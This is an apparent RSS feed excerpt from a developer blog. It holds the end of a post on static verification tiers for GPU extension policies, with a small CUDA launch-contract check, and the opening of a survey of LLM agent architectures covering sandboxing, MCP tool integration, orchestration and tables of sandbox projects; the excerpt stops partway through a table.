&lt;ul&gt;
&lt;li&gt;Ban warp sync primitives (#2) — mask correctness is unverifiable without ITS-aware analysis&lt;/li&gt;
&lt;li&gt;Ban spin-wait / polling loops (#10) — causes stale reads and ad-hoc synchronization&lt;/li&gt;
&lt;li&gt;Ban blocking primitives: locks, mutexes, named barriers (#15) — prevents non-barrier deadlocks&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;em&gt;Tier B — Static-sound analysis (11 classes, allow but verify safe usage):&lt;/em&gt;&lt;/p&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Verification capability&lt;/th&gt;
&lt;th&gt;Bug classes covered&lt;/th&gt;
&lt;th&gt;What it does&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;Uniform control-flow analysis&lt;/td&gt;
&lt;td&gt;#1 barrier divergence, #4 warp-divergence race, #6 control-flow divergence&lt;/td&gt;
&lt;td&gt;Prove barriers are at uniform points; side-effects on uniform paths&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Memory access pattern analysis&lt;/td&gt;
&lt;td&gt;#5 uncoalesced access (the same stride analysis feeds the Tier C heuristic for #7 bank conflicts)&lt;/td&gt;
&lt;td&gt;Check stride patterns; reject non-conforming index expressions&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Race-freedom structural rules&lt;/td&gt;
&lt;td&gt;#11 shared-mem races, #17 global-mem races&lt;/td&gt;
&lt;td&gt;Per-lane sharding / lane0-only / atomic helpers + state isolation&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Scope enforcement&lt;/td&gt;
&lt;td&gt;#3 atomic scope&lt;/td&gt;
&lt;td&gt;Force device-scope for policy atomics + state isolation&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Pointer/memory safety&lt;/td&gt;
&lt;td&gt;#18 memory safety&lt;/td&gt;
&lt;td&gt;Restrict pointer operations, analogous to eBPF pointer verification&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Loop termination&lt;/td&gt;
&lt;td&gt;#16 non-termination&lt;/td&gt;
&lt;td&gt;Enforce bounded iteration counts&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Range analysis&lt;/td&gt;
&lt;td&gt;#19 arithmetic errors&lt;/td&gt;
&lt;td&gt;Track value ranges to prevent overflow cascading into OOB&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Resource budgets&lt;/td&gt;
&lt;td&gt;#14 atomic contention&lt;/td&gt;
&lt;td&gt;Limit atomic counts / enforce warp-aggregation&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;p&gt;&lt;em&gt;Tier C — Static-heuristic detection (2 classes, performance warnings/rejections):&lt;/em&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;#7 bank conflicts → check shared-memory index stride against bank mapping&lt;/li&gt;
&lt;li&gt;#12 redundant barriers → dependence analysis to determine if a barrier protects actual cross-thread dependencies&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;strong&gt;Stage 2: Attach-time contract validation (2 classes)&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;#8 block-size dependence → policy declares preconditions (e.g., &lt;code&gt;requires: blockDim.x &amp;gt;= 128&lt;/code&gt;), validated when attaching to a specific kernel&lt;/li&gt;
&lt;li&gt;#9 launch config assumptions → validate grid/block dimensions satisfy policy preconditions&lt;/li&gt;
&lt;/ul&gt;
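
&lt;p&gt;As a rough illustration of attach-time validation, a contract can be a small record that is checked against the concrete launch configuration before the policy is attached. The &lt;code&gt;PolicyContract&lt;/code&gt; fields and the &lt;code&gt;contract_allows&lt;/code&gt; function are hypothetical; only &lt;code&gt;dim3&lt;/code&gt; comes from the CUDA runtime headers:&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight cuda"&gt;&lt;code&gt;#include &amp;lt;cuda_runtime.h&amp;gt;

// Hypothetical contract declared by a policy at load time.
struct PolicyContract {
  unsigned int min_block_x;       // e.g. requires: blockDim.x &amp;gt;= 128
  unsigned int block_x_multiple;  // e.g. 32 to require whole warps; 1 = no constraint
  unsigned int max_grid_x;        // 0 = no constraint
};

// Host-side check run when the policy is attached to a specific kernel launch.
inline bool contract_allows(PolicyContract c, dim3 grid, dim3 block) {
  if (block.x &amp;lt; c.min_block_x) return false;
  if (c.block_x_multiple &amp;gt; 1) {
    if (block.x % c.block_x_multiple != 0) return false;
  }
  if (c.max_grid_x != 0) {
    if (grid.x &amp;gt; c.max_grid_x) return false;
  }
  return true;
}
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;

&lt;p&gt;With &lt;code&gt;min_block_x = 128&lt;/code&gt; and &lt;code&gt;block_x_multiple = 32&lt;/code&gt;, a launch with 256 threads per block is accepted and a launch with 64 threads per block is rejected before the policy ever runs.&lt;/p&gt;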

&lt;p&gt;&lt;strong&gt;Stage 3: CI/Offline + Runtime (complementary coverage)&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;#13 host↔device async races → CuSan/TSan dynamic detection, beyond device-side verification scope&lt;/li&gt;
&lt;li&gt;GPUVerify/ESBMC-GPU for kernel+extension combined analysis (when source is available)&lt;/li&gt;
&lt;li&gt;Compute Sanitizer suite for dynamic regression testing&lt;/li&gt;
&lt;li&gt;iGUARD/Simulee for advanced race detection&lt;/li&gt;
&lt;li&gt;Runtime enforcement (Guardian-style memory fencing) for multi-tenant isolation&lt;/li&gt;
&lt;/ul&gt;

&lt;h4&gt;
  
  
  The eBPF Lesson Applied to GPUs
&lt;/h4&gt;

&lt;p&gt;Just as eBPF succeeds by restricting extension capabilities to what can be verified without inspecting the kernel, a GPU extension verifier should:&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;
&lt;strong&gt;Ban only what is genuinely dangerous and unnecessary&lt;/strong&gt; — warp sync, spin-wait, and blocking primitives have no legitimate use in policy code&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Use static analysis to allow useful features safely&lt;/strong&gt; — barriers, shared memory, and atomics are valuable; verify their safe usage rather than banning them&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Isolate policy state&lt;/strong&gt; to reduce Combined bugs to Extension-local&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Enforce warp-uniformity&lt;/strong&gt; for side effects, bounding SIMT-amplified overhead&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Use budgets&lt;/strong&gt; for performance-affecting resources (atomics, memory ops)&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Require contracts&lt;/strong&gt; only for unavoidably Combined properties (#8, #9)&lt;/li&gt;
&lt;/ol&gt;

&lt;p&gt;The key design principle is &lt;em&gt;not&lt;/em&gt; to ban everything that could go wrong, but to apply the right level of restriction for each risk: outright bans for constructs with no legitimate policy use, static verification for useful but dangerous features, and heuristic detection for performance concerns. This preserves policy expressiveness while maintaining soundness for safety-critical GPU extensions.&lt;/p&gt;




</description>
      <category>ebpf</category>
      <category>gpu</category>
      <category>verifier</category>
    </item>
    <item>
      <title>Architectures for Agent Systems: A Survey of Isolation, Integration, and Governance</title>
      <dc:creator>云微</dc:creator>
      <pubDate>Tue, 03 Feb 2026 07:36:18 +0000</pubDate>
      <link>https://forem.com/yunwei37/architectures-for-agent-systems-a-survey-of-isolation-integration-and-governance-2185</link>
      <guid>https://forem.com/yunwei37/architectures-for-agent-systems-a-survey-of-isolation-integration-and-governance-2185</guid>
      <description>&lt;p&gt;Large Language Model (LLM) based agent systems – software that leverages LLMs to autonomously plan and execute multi-step tasks using external tools – are rapidly moving from proof-of-concept demos into enterprise deployment. These agents promise to automate coding, IT operations, data analysis, and more, but deploying them in production raises new challenges in security, reliability, and integration. Over the last half-year, the community has converged on key strategies: strong isolation for executing untrusted actions, standardized protocols for tool integration, and governance frameworks to align agent behavior with enterprise policies. This survey provides a systematic review of recent developments (roughly the latter half of 2025), including agent sandbox architectures, emerging standards like MCP, open-source projects, industry initiatives, and research advances. We focus on the pain points encountered when bringing agent systems to production and how the latest solutions address (or still fall short on) those needs.&lt;/p&gt;

&lt;h2&gt;
  
  
  1. Agent System Architecture in the Enterprise
&lt;/h2&gt;

&lt;p&gt;An enterprise-ready agent system typically consists of several layers: (i) an LLM-based reasoning core (the "agent" that decides which actions to take), (ii) an interface to invoke external tools or services (e.g. via APIs, command-line, databases), and (iii) an execution environment or runtime where the agent's tool actions (like running code or shell commands) actually occur. Surrounding these are components for memory/state storage, orchestration (especially if multiple agents work together), and monitoring &amp;amp; control (for safety and compliance). The overarching architectural challenge is that these systems are highly dynamic and open-ended: the agent may generate arbitrary code or tool requests at runtime, often based on unpredictable input. This requires a different approach to software architecture than traditional deterministic services.&lt;/p&gt;

&lt;p&gt;Isolation and Safety by Design. Unlike a bounded microservice, an AI agent might decide to execute unvetted code or make system-altering calls. A core architectural principle emerging in 2025 is to sandbox the agent's actions – running them in an isolated environment that protects the host system and network. For example, the open-source Agent Sandbox for Kubernetes was introduced as a new Kubernetes primitive to run AI agents safely. Instead of letting LLM-generated code run in a standard container (which could still abuse the host kernel or other pods), Agent Sandbox uses a sandboxed runtime (gVisor's user-space kernel, with optional Kata Containers lightweight VMs) to create a secure barrier between the agent's code and the cluster node's OS. This isolates potentially malicious or errant code from interfering with other applications or the host. The Sandbox is managed via a custom Kubernetes resource (CRD) called &lt;code&gt;Sandbox&lt;/code&gt;, which represents a single, stateful, long-lived pod with a stable identity and persistent storage. This design reflects a shift from treating agent workloads as ephemeral stateless functions to treating them as session-oriented services that may hold state over time. Indeed, the Agent Sandbox supports features like pausing and resuming the sandbox, automatically reviving it if a network reconnect is needed, and even memory sharing across sandboxes for efficiency. It also provides a templating and pool mechanism – &lt;code&gt;SandboxTemplate&lt;/code&gt; and &lt;code&gt;SandboxClaim&lt;/code&gt; – to manage pools of pre-warmed sandbox pods. Pre-warming is crucial because launching a fresh isolated sandbox can be slow; by keeping a pool of ready-to-go sandboxes, startup latency for a new agent session is dramatically reduced (Google reports sub-second startup latency, a ~90% improvement over cold-starting sandboxes).
In Google's GKE, this is paired with a new Pod Snapshots feature that can checkpoint and restore running sandbox pods (even GPU workloads), cutting startup from minutes to seconds and avoiding idle resource waste. In short, the sandbox architecture is purpose-built for autonomous agents: it provides stronger isolation than ordinary containers, yet supports persistent state and fast elasticity to accommodate long-running, interactive agent tasks at scale.&lt;/p&gt;

&lt;p&gt;Stateful Singleton Runtimes. Traditional cloud apps often scale by running many stateless instances behind a load balancer, but agent use-cases (like an AI coding assistant or an autonomous scheduler) often manifest as a single specialized "worker" with memory (such as cached tools or context) that persists across many tool calls. The Kubernetes Agent Sandbox explicitly targets these singleton, stateful workloads – not just for AI agents but also things like CI/CD build agents or single-node databases that require stable identity and disk state. This reflects a broader industry recognition: agent applications need new runtime primitives that can maintain continuity of state and identity across a session (for example, so the agent can incrementally build on previous tool outputs, or maintain an authenticated session to a service). Recent designs propose durable execution for agents – the ability to pause an agent's process, snapshot its memory or file system, and later resume or even migrate it. The GKE Agent Sandbox + Pod Snapshot combo is an early real-world example of this, effectively treating an agent's environment as a checkpointable virtual machine. We anticipate emerging orchestration support where an agent can be hibernated when idle and quickly reawakened when needed, balancing responsiveness with efficient resource use.&lt;/p&gt;

&lt;p&gt;Tool Interface Layer. The other critical piece of architecture is how agents interface with external tools and data. Historically, each AI assistant platform invented its own plugin system or API schema (e.g. OpenAI's Plugins, LangChain's tool abstractions). This led to a fragmented ecosystem where tools had to be rewritten for each agent framework. Over 2025, a consensus has grown around Model Context Protocol (MCP) as a standard interface between AI models (the clients) and tools or services (the servers). MCP was released by Anthropic in late 2024, and during 2025 it became "the universal standard protocol for connecting AI models to tools, data, and applications". Conceptually, MCP defines a simple JSON-RPC-based client-server protocol by which an AI agent can discover available tools, invoke them with arguments, and receive results. The tools can be anything: database queries, file system operations, web requests, code compilation – each exposed by an MCP server that the agent connects to. The power of a common protocol is that it transforms the integration problem from M×N (every model integrating with every tool) to M+N: with 5 models and 20 tools, that is 25 adapters instead of 100. A tool developer can create an MCP server once, and any compliant agent (whether it's OpenAI's, Anthropic's, or an open-source project) can use it. This dramatically reduces duplicated effort and makes the system more maintainable. GitHub engineers describe MCP as creating a "USB-C for AI" – a universal port for tools. In practice, MCP connections can be local (via stdio pipes) or remote (Streamable HTTP, which replaced the original HTTP+SSE transport in later spec revisions), and are typically stateful sessions, which aligns well with the idea of agent tools that maintain context (e.g. a database connection that stays open, or a browser that retains cookies).&lt;/p&gt;
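
&lt;p&gt;The discover-then-invoke flow can be sketched in a few lines of Python. The method names &lt;code&gt;tools/list&lt;/code&gt; and &lt;code&gt;tools/call&lt;/code&gt; and the &lt;code&gt;name&lt;/code&gt;/&lt;code&gt;arguments&lt;/code&gt;/&lt;code&gt;content&lt;/code&gt; fields follow the MCP specification; everything else is an assumption made for illustration: the &lt;code&gt;add&lt;/code&gt; tool, the &lt;code&gt;TOOLS&lt;/code&gt; registry, and the in-process &lt;code&gt;handle&lt;/code&gt; function that stands in for a real server. The initialization handshake and the transport are omitted.&lt;/p&gt;

```python
import json


def rpc_request(req_id, method, params=None):
    """Build a JSON-RPC 2.0 request string, the framing MCP messages use."""
    msg = {"jsonrpc": "2.0", "id": req_id, "method": method}
    if params is not None:
        msg["params"] = params
    return json.dumps(msg)


# Hypothetical tool registry for this sketch; a real server would wrap real systems.
TOOLS = {
    "add": {
        "description": "Add two integers.",
        "inputSchema": {
            "type": "object",
            "properties": {"a": {"type": "integer"}, "b": {"type": "integer"}},
            "required": ["a", "b"],
        },
        "handler": lambda args: args["a"] + args["b"],
    }
}


def rpc_error(req_id, code, message):
    return json.dumps({"jsonrpc": "2.0", "id": req_id,
                       "error": {"code": code, "message": message}})


def handle(raw):
    """Toy in-process 'server': answers tools/list and tools/call only."""
    req = json.loads(raw)
    if req["method"] == "tools/list":
        result = {"tools": [
            {"name": name, "description": t["description"], "inputSchema": t["inputSchema"]}
            for name, t in TOOLS.items()
        ]}
    elif req["method"] == "tools/call":
        params = req["params"]
        tool = TOOLS.get(params["name"])
        if tool is None:
            return rpc_error(req["id"], -32602, "Unknown tool")
        value = tool["handler"](params.get("arguments", {}))
        result = {"content": [{"type": "text", "text": str(value)}], "isError": False}
    else:
        return rpc_error(req["id"], -32601, "Method not found")
    return json.dumps({"jsonrpc": "2.0", "id": req["id"], "result": result})


# Agent side: discover the tools first, then invoke one by name.
listed = json.loads(handle(rpc_request(1, "tools/list")))
called = json.loads(handle(rpc_request(
    2, "tools/call", {"name": "add", "arguments": {"a": 2, "b": 3}})))
unknown = json.loads(handle(rpc_request(3, "tools/call", {"name": "rm", "arguments": {}})))
```

&lt;p&gt;Because both sides only agree on message shapes, the same client code would work against any server that advertises its tools this way, which is where the M+N property comes from.&lt;/p&gt;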

&lt;p&gt;Orchestration and Multi-Agent Workflows. Many real tasks may be too complex for a single agent or might benefit from specialized agents collaborating. The architecture is therefore expanding to support multi-agent systems where agents communicate or coordinate. Some protocols, like Agent-to-Agent (A2A) messaging, are emerging to standardize inter-agent communication (for instance, Google's Agent2Agent protocol and Microsoft's adoption of A2A in their framework). In a multi-agent setup, you might have one agent that specializes in planning, another in executing code, another in validation, etc., passing context or subtasks among them. Orchestration frameworks now often support deterministic workflows (where the chain of sub-tasks is predefined, akin to a business process) alongside LLM-driven orchestration (where agents dynamically decide how to break down and assign tasks). For example, Microsoft's new open-source Agent Framework explicitly supports both Agent Orchestration (LLM-driven, creative, adaptive) and Workflow Orchestration (fixed logic, for reliable repeatability) within one runtime. This framework, released in late 2025, consolidates previous research prototypes (like Semantic Kernel's planner and AutoGen from MSR) into an enterprise-ready SDK. It emphasizes connectors to enterprise systems, open standards (MCP, A2A, OpenAPI), and built-in telemetry, approvals, and long-running durability to meet enterprise needs. The trend here is that agents are being treated as first-class components of software systems, with the same expectations for monitoring, security, and lifecycle management as microservices or human-in-the-loop workflows.&lt;/p&gt;

&lt;p&gt;Summary: The architecture of modern agent systems is coalescing around a modular, layered design. A secure sandboxed execution layer ensures that any generated code or commands run in isolation with controlled privileges. A standardized tool interface layer (MCP and similar protocols) decouples agent reasoning from the implementation of tools, enabling a rich ecosystem of reusable capabilities. On top of these, orchestration mechanisms allow composing multiple agents and tools into larger autonomous workflows, while providing hooks for humans and existing DevOps processes to supervise and intervene when needed. In the following sections, we delve deeper into three crucial aspects of enterprise agent systems: (a) the sandbox and runtime isolation mechanisms, (b) the emerging standards and ecosystems of tools/plugins, and (c) the security, governance, and observability considerations that are top-of-mind as organizations deploy these systems.&lt;/p&gt;

&lt;h2&gt;
  
  
  2. Isolated Execution Environments for Agents (Sandboxing)
&lt;/h2&gt;

&lt;p&gt;Running untrusted or machine-generated code has always been risky – the difference now is that with LLM agents the code is being generated and executed on the fly, without a human vetting each command. This opens the door to accidental failures or even malicious exploits if the agent is tricked or if its outputs are unsafe. As a result, sandboxing has become a foundational requirement for agent systems. Sandboxing in this context means confining the agent's actions (code execution, file system writes, network calls, etc.) to an environment where it can't harm other processes or breach data it shouldn't access.&lt;/p&gt;

&lt;h3&gt;
  
  
  Table 1: Research / OSS Projects (Papers, Benchmarks, Open-Source Runtimes)
&lt;/h3&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Name&lt;/th&gt;
&lt;th&gt;Category&lt;/th&gt;
&lt;th&gt;Sandbox/Isolation Boundary&lt;/th&gt;
&lt;th&gt;Key Capabilities&lt;/th&gt;
&lt;th&gt;Reference&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;Kubernetes SIGs: agent-sandbox&lt;/td&gt;
&lt;td&gt;OSS (K8s Primitives/Controller)&lt;/td&gt;
&lt;td&gt;Sandbox CRD in Kubernetes (with Template/Claim/WarmPool)&lt;/td&gt;
&lt;td&gt;Manage "isolated + stateful + singleton" workloads; standardized API for agent runtime&lt;/td&gt;
&lt;td&gt;&lt;a href="https://github.com/kubernetes-sigs/agent-sandbox" rel="noopener noreferrer"&gt;GitHub&lt;/a&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;AIO Sandbox (agent-infra/sandbox)&lt;/td&gt;
&lt;td&gt;OSS (All-in-One Environment)&lt;/td&gt;
&lt;td&gt;Single Docker container (integrated multi-tools)&lt;/td&gt;
&lt;td&gt;Browser/Shell/File/MCP/VSCode Server unified; unified workspace for agents &amp;amp; dev&lt;/td&gt;
&lt;td&gt;&lt;a href="https://github.com/agent-infra/sandbox" rel="noopener noreferrer"&gt;GitHub&lt;/a&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Alibaba OpenSandbox&lt;/td&gt;
&lt;td&gt;OSS (Universal Sandbox Platform)&lt;/td&gt;
&lt;td&gt;Unified protocol + multi-language SDK + sandbox runtime&lt;/td&gt;
&lt;td&gt;Universal sandbox foundation for command/file/code/browser/agent execution&lt;/td&gt;
&lt;td&gt;&lt;a href="https://github.com/alibaba/OpenSandbox" rel="noopener noreferrer"&gt;GitHub&lt;/a&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;E2B (e2b-dev/E2B)&lt;/td&gt;
&lt;td&gt;OSS (Cloud Sandbox Infrastructure)&lt;/td&gt;
&lt;td&gt;Cloud-isolated sandbox (SDK controlled)&lt;/td&gt;
&lt;td&gt;Run AI-generated code in cloud; Python/JS SDK; for agent code interpreter&lt;/td&gt;
&lt;td&gt;&lt;a href="https://github.com/e2b-dev/E2B" rel="noopener noreferrer"&gt;GitHub&lt;/a&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;E2B Desktop (e2b-dev/desktop)&lt;/td&gt;
&lt;td&gt;OSS (Virtual Desktop Sandbox)&lt;/td&gt;
&lt;td&gt;Isolated virtual desktop environment&lt;/td&gt;
&lt;td&gt;"Computer Use" agent: desktop GUI, customizable dependencies, per-sandbox isolation&lt;/td&gt;
&lt;td&gt;&lt;a href="https://github.com/e2b-dev/desktop" rel="noopener noreferrer"&gt;GitHub&lt;/a&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;LLM Sandbox (vndee/llm-sandbox)&lt;/td&gt;
&lt;td&gt;OSS (Lightweight Code Sandbox)&lt;/td&gt;
&lt;td&gt;Containerized isolation (configurable security policies)&lt;/td&gt;
&lt;td&gt;Run LLM-generated code; customizable security policies and isolated container environments&lt;/td&gt;
&lt;td&gt;&lt;a href="https://github.com/vndee/llm-sandbox" rel="noopener noreferrer"&gt;GitHub&lt;/a&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;SkyPilot Code Sandbox (alex000kim/…)&lt;/td&gt;
&lt;td&gt;OSS (Self-hosted Execution Service)&lt;/td&gt;
&lt;td&gt;SkyPilot deployment + Docker sandboxing&lt;/td&gt;
&lt;td&gt;Self-hosted, multi-language execution, token auth, MCP integration (for agent tools)&lt;/td&gt;
&lt;td&gt;&lt;a href="https://github.com/alex000kim/skypilot-code-sandbox" rel="noopener noreferrer"&gt;GitHub&lt;/a&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Microsandbox (zerocore-ai/microsandbox)&lt;/td&gt;
&lt;td&gt;OSS (microVM Execution Environment)&lt;/td&gt;
&lt;td&gt;Hardware-isolated microVM (fast startup)&lt;/td&gt;
&lt;td&gt;Run untrusted workloads via microVM; emphasis on isolation strength and startup speed&lt;/td&gt;
&lt;td&gt;&lt;a href="https://github.com/zerocore-ai/microsandbox" rel="noopener noreferrer"&gt;GitHub&lt;/a&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;ERA (BinSquare/ERA)&lt;/td&gt;
&lt;td&gt;OSS (Local microVM Sandbox)&lt;/td&gt;
&lt;td&gt;Local microVM ("microVM with container ease-of-use")&lt;/td&gt;
&lt;td&gt;Run untrusted/AI-generated code locally with hardware-level isolation&lt;/td&gt;
&lt;td&gt;&lt;a href="https://github.com/BinSquare/ERA" rel="noopener noreferrer"&gt;GitHub&lt;/a&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;SandboxAI (substratusai/sandboxai)&lt;/td&gt;
&lt;td&gt;OSS (Runtime)&lt;/td&gt;
&lt;td&gt;Isolated sandbox&lt;/td&gt;
&lt;td&gt;Secure execution runtime for AI-generated Python code and shell commands&lt;/td&gt;
&lt;td&gt;&lt;a href="https://github.com/substratusai/sandboxai" rel="noopener noreferrer"&gt;GitHub&lt;/a&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Python MCP Sandbox (JohanLi233/mcp-sandbox)&lt;/td&gt;
&lt;td&gt;OSS (MCP Server)&lt;/td&gt;
&lt;td&gt;Docker container isolation&lt;/td&gt;
&lt;td&gt;Expose "secure Python execution" as a tool to agent/LLM clients via MCP&lt;/td&gt;
&lt;td&gt;&lt;a href="https://github.com/JohanLi233/mcp-sandbox" rel="noopener noreferrer"&gt;GitHub&lt;/a&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Code Sandbox MCP (Automata-Labs-team/…)&lt;/td&gt;
&lt;td&gt;OSS (MCP Server)&lt;/td&gt;
&lt;td&gt;Docker container isolation&lt;/td&gt;
&lt;td&gt;MCP server: provide containerized secure code execution environment for AI applications&lt;/td&gt;
&lt;td&gt;&lt;a href="https://github.com/Automata-Labs-team/code-sandbox-mcp" rel="noopener noreferrer"&gt;GitHub&lt;/a&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;ToolSandbox (Apple)&lt;/td&gt;
&lt;td&gt;Research + OSS (Evaluation Benchmark)&lt;/td&gt;
&lt;td&gt;Evaluation sandbox with "stateful tool execution + user simulator"&lt;/td&gt;
&lt;td&gt;Evaluate LLM tool-use: state dependencies, multi-turn dialogue, dynamic evaluation; open-source&lt;/td&gt;
&lt;td&gt;&lt;a href="https://arxiv.org/abs/2408.04682" rel="noopener noreferrer"&gt;arXiv&lt;/a&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;ToolEmu&lt;/td&gt;
&lt;td&gt;Research (Risk Evaluation Framework)&lt;/td&gt;
&lt;td&gt;LM-emulated sandbox (simulate tool execution with LM)&lt;/td&gt;
&lt;td&gt;Use LM to simulate tool execution for scalable agent risk testing; includes automatic safety evaluator&lt;/td&gt;
&lt;td&gt;&lt;a href="https://openreview.net/forum?id=GEcwtMk1uA" rel="noopener noreferrer"&gt;OpenReview&lt;/a&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;HAICOSYSTEM&lt;/td&gt;
&lt;td&gt;Research + OSS (Safety Evaluation Ecosystem)&lt;/td&gt;
&lt;td&gt;Modular interaction sandbox (human-agent-tool multi-turn simulation)&lt;/td&gt;
&lt;td&gt;Multi-domain scenario simulation and multi-dimensional risk evaluation (operational/content/social/legal); code platform&lt;/td&gt;
&lt;td&gt;&lt;a href="https://arxiv.org/abs/2409.16427" rel="noopener noreferrer"&gt;arXiv&lt;/a&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;EnterpriseBench&lt;/td&gt;
&lt;td&gt;Research (Enterprise Environment Evaluation Sandbox)&lt;/td&gt;
&lt;td&gt;"Evaluation environment" for enterprise tasks/tools/data&lt;/td&gt;
&lt;td&gt;Evaluate LLM agents in enterprise scenarios (task execution, tool dependencies, data retrieval)&lt;/td&gt;
&lt;td&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Managing Linux servers with LLM-based AI agents&lt;/td&gt;
&lt;td&gt;Research (Empirical Evaluation)&lt;/td&gt;
&lt;td&gt;Dockerized Linux sandbox&lt;/td&gt;
&lt;td&gt;Let agents execute server tasks in Dockerized Linux environment and evaluate performance&lt;/td&gt;
&lt;td&gt;&lt;a href="https://www.sciencedirect.com/science/article/pii/S266682702400046X" rel="noopener noreferrer"&gt;ScienceDirect&lt;/a&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Multi-Programming Language Sandbox for LLMs&lt;/td&gt;
&lt;td&gt;Research (Multi-language Execution Sandbox)&lt;/td&gt;
&lt;td&gt;Container-isolated sub-sandbox&lt;/td&gt;
&lt;td&gt;Multi-language compilation/execution isolation (sub-sandbox isolated from main environment)&lt;/td&gt;
&lt;td&gt;&lt;a href="https://arxiv.org/html/2410.23074v1" rel="noopener noreferrer"&gt;arXiv&lt;/a&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;awesome-sandbox (restyler/awesome-sandbox)&lt;/td&gt;
&lt;td&gt;OSS (Ecosystem Overview/List)&lt;/td&gt;
&lt;td&gt;N/A (aggregation)&lt;/td&gt;
&lt;td&gt;Systematic curated list &amp;amp; analysis of "code sandboxing solutions"; good entry point for long-tail coverage&lt;/td&gt;
&lt;td&gt;&lt;a href="https://github.com/restyler/awesome-sandbox" rel="noopener noreferrer"&gt;GitHub&lt;/a&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;blockquote&gt;
&lt;p&gt;Note: Achieving exhaustive coverage is impractical (especially given the long tail of the MCP ecosystem), so this table covers mainstream/representative projects plus ecosystem indexes. The &lt;code&gt;awesome-sandbox&lt;/code&gt; list serves as an entry point for additional coverage.&lt;/p&gt;
&lt;/blockquote&gt;

&lt;h3&gt;
  
  
  Table 2: Commercial / Cloud Service Projects (Agent Sandbox / Code Sandbox / Runtime)
&lt;/h3&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Product/Service&lt;/th&gt;
&lt;th&gt;Vendor&lt;/th&gt;
&lt;th&gt;Isolation/Execution Model&lt;/th&gt;
&lt;th&gt;Key Capabilities&lt;/th&gt;
&lt;th&gt;Reference&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;Code Interpreter (Tools)&lt;/td&gt;
&lt;td&gt;OpenAI&lt;/td&gt;
&lt;td&gt;Managed Python sandbox execution&lt;/td&gt;
&lt;td&gt;Model writes and runs Python; for data analysis/coding/math&lt;/td&gt;
&lt;td&gt;&lt;a href="https://platform.openai.com/docs/guides/tools-code-interpreter" rel="noopener noreferrer"&gt;OpenAI Platform&lt;/a&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Code Interpreter (Assistants on Azure)&lt;/td&gt;
&lt;td&gt;Microsoft Azure OpenAI&lt;/td&gt;
&lt;td&gt;Managed Python sandbox execution&lt;/td&gt;
&lt;td&gt;Assistants API runs Python in sandbox environment (per Azure docs)&lt;/td&gt;
&lt;td&gt;&lt;a href="https://learn.microsoft.com/en-us/azure/ai-foundry/openai/how-to/code-interpreter" rel="noopener noreferrer"&gt;Microsoft Learn&lt;/a&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;E2B (Managed Cloud)&lt;/td&gt;
